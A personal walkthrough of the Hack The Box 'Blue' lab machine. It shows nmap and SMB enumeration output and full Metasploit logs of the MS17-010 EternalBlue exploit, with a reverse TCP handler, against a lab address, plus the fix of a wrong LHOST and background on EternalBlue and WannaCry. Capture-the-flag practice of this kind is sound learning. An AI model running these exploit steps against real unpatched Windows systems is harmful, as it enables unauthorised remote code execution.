This box is very easy, ideal for whoever is starting with hacking. This is a walkthrough and my personal experience with the HTB – Blue box. I’m gonna show how I have scanned and enumerated the system, what I have tools I have used to root the box and a common pitfall of people approaching Metasploit for the first time. I’ll also explain what famous vulnerability this box is based on.
Table of Contents
Scanning and enumeration
I started with a classic NMap scan of all the ports of the machine:
root@kali:/home/kali# nmap -T4 -A -p- 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 10:41 EST Nmap scan report for 10.10.10.40 Host is up (0.051s latency). Not shown: 65526 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=11/28%OT=135%CT=1%CU=39401%PV=Y%DS=2%DC=T%G=Y%TM=5FC27 OS:016%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=2%ISR=10D%TI=I%CI=I%II=I%SS=S%T OS:S=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5= OS:M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2 OS:000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A OS:=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF= OS:Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%R OS:D=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W= OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U OS:1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF OS:I=N%T=80%CD=Z) Network Distance: 2 hops Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1m05s, deviation: 2s, median: 1m03s | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-11-28T15:44:16+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-11-28T15:44:17 |_ start_date: 2020-11-28T15:41:38 TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 47.74 ms 10.10.14.1 2 48.03 ms 10.10.10.40 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 126.71 seconds
It looked like I was dealing with Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1), with SMB protocol – Server Message Block, which is a communication protocol used by windows systems to provide access to shared files, printers and ports. SMB used to run on top of Netbios (an older transport layer) on port 139, but after Windows 2000 it started to use the TCP protocol on port 445.
I wanted to see what else I could gather from the SMB service, if there were folders that allowed anonymous logins for example, which folders were available, etc. So I’ve connected to it using smbclient on Kali:
root@kali:/home/kali# smbclient -L \\\.10.10.40\\ Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Share Disk Users Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
Trying to connect to those shares through smbclient didn’t work.
I’ve started to look around for potential exploits related to the OS / services on this box and found a couple of interesting things:
https://www.exploit-db.com/exploits/42315 (python script for EternalBlue’ SMB Remote Code Execution (MS17-010))
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/ (metasploit module for MS17-010)
Exploitation
Searching on Google for MS17-010, and for anything else related to Windows 7 Professional 7601 Service Pack 1 and SMB, I’ve found a metasploit module that seemed good for this machine.
So I tried it but it didn’t work:
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.1.57:4444 [*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete) [*] 10.10.10.40:445 - Connecting to target for exploitation. [+] 10.10.10.40:445 - Connection established for exploitation. [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes) [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet [*] 10.10.10.40:445 - Starting non-paged pool grooming [+] 10.10.10.40:445 - Sending SMBv2 buffers [+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.10.40:445 - Sending final SMBv2 buffers. [*] 10.10.10.40:445 - Sending last fragment of exploit packet! [*] 10.10.10.40:445 - Receiving response from exploit packet [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.10.10.40:445 - Sending egg to corrupted connection. [*] 10.10.10.40:445 - Triggering free of corrupted buffer. [-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 10.10.10.40:445 - Connecting to target for exploitation. [+] 10.10.10.40:445 - Connection established for exploitation. [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes) [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations. [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet [*] 10.10.10.40:445 - Starting non-paged pool grooming [+] 10.10.10.40:445 - Sending SMBv2 buffers [+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.10.40:445 - Sending final SMBv2 buffers. [*] 10.10.10.40:445 - Sending last fragment of exploit packet! [*] 10.10.10.40:445 - Receiving response from exploit packet [-] 10.10.10.40:445 - Did not receive a response from exploit packet [*] 10.10.10.40:445 - Sending egg to corrupted connection. [-] 10.10.10.40:445 - Errno::ECONNRESET: Connection reset by peer [*] Exploit completed, but no session was created. msf5 exploit(windows/smb/ms17_010_eternalblue) >
I’ve then tried using a python script for the same vulnerability: MS17-010 EternalBlue, but it gave an error:
kali@kali:~/Downloads$ python3 42315.py 10.10.10.40 Target OS: Windows 7 Professional 7601 Service Pack 1 Not found accessible named pipe Done
Another metasploit module for the same vulnerability didn’t work:
msf5 exploit(windows/smb/ms17_010_psexec) > exploit [*] Started reverse TCP handler on 192.168.1.57:4444 [*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1 [-] 10.10.10.40:445 - Timeout::Error [-] 10.10.10.40:445 - execution expired [-] 10.10.10.40:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:75:in `rescue in read' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:69:in `read' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:159:in `block in timed_read' /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:158:in `timed_read' /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:73:in `smb_recv' /usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:889:in `recv_transaction_data' /usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:527:in `align_transaction_and_leak' /usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:386:in `block in exploit_matched_pairs' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activesupport-4.2.11.3/lib/active_support/core_ext/range/each.rb:7:in `each' /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activesupport-4.2.11.3/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone' /usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:381:in `exploit_matched_pairs' /usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:44:in `eternal_pwn' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:110:in `exploit' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:215:in `job_run_proc' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:169:in `run' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:140:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:164:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:55:in `exploit_single' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:201:in `cmd_exploit' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' /usr/bin/msfconsole:23:in `<main>' [*] Exploit completed, but no session was created.
Tried to enumerate to find more about pipes using a metasploit module:
sf5 auxiliary(scanner/smb/smb2) > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.10.10.40 rhost => 10.10.10.40 msf5 auxiliary(scanner/smb/smb_ms17_010) > run [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/smb/smb_ms17_010) > set check_pipe true check_pipe => true msf5 auxiliary(scanner/smb/smb_ms17_010) > options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE true no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS 10.10.10.40 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) msf5 auxiliary(scanner/smb/smb_ms17_010) > run [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [+] 10.10.10.40:445 - Named pipe found: \netlogon [*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
A common mistake
I knew that the machine was vulnerable to EternalBlue because the version of the OS and services on this machine matched the ones that the info online shows. And as you can see from the above results even that other tool confirmed that the machine should have been vulnerable to Eternal Blue. So what went wrong?
It was the first time I was using Metasploit through a VPN to test a target machine and there’s an issue that’s quite common among beginners (and not):
if we are testing a box in our local network, for example a metasploitable machine in a virtual machine or on another laptop in our network, we usually have a local IP address (something like 192.168.0.xx).
When connecting to another network, like via VPN like in the case of Hack The Box, we may use another interface to connect that has its own IP, which in the case of HTB is something like 10.10.xx.xx.
But when Metasploit sets up a module to be used, it sets as a standard the local IP address (starting with 192.168.), rather than the VPN one. Sometimes it’s tricky because you load the options of a module and all is good. Then you set the payload (which usually has its own LHOST to be set) and that one has your 192.168.0.xx address. So if you forget to check again the options, like often happens, you would make the same mistake that I did with this box.
So after checking my previous logs, I noticed that the LHOST of the first time I’ve run the ms17_010_eternalblue exploit was 192.18.1.57. Re-running the script with the correct local IP instead was successful and BOOM! I got my root access to the box.
At that point it was just a matter of looking for the user.txt and root.txt files that had the flags inside them.
EternalBlue: What is it?
Hack The Box machines (and if you did some CTFs, you should have realised that’s a common thing) often have names that hint to the topic of that machine. In this case the box ‘Blue’ was about the famous Eternal Blue.
EternalBlue exploits a vulnerability (CVE-2017-0144 in the CVE catalogue and called ) rose to prominance in 2017 when the Shadow Brokers brought it to light, and was later used in that year by the WannaCry ransomwere. Allegedly this exploit was developed by the NSA.
Simply put this exploit works by using SMBv1 vulnerabilities based on how Windows handles specially crafted packets from attackers, leveraging 3 different bugs.
Microsoft released a patch for this vulnerability in April 2017, one month before the Shadow Brokers tweet that made public EternalBlue, but it still managed to do a lot of damage because often times people (and especially organizations) don’t patch their machines in a timely fashion.
For a more technical explanation you could read this article.
I have a lot of other writeups for HackTheBox machines that I still have to publish, and I’ll try to do it as soon as possible, so if you are interested in this type of content keep an eye out for future articles or take a look around my website.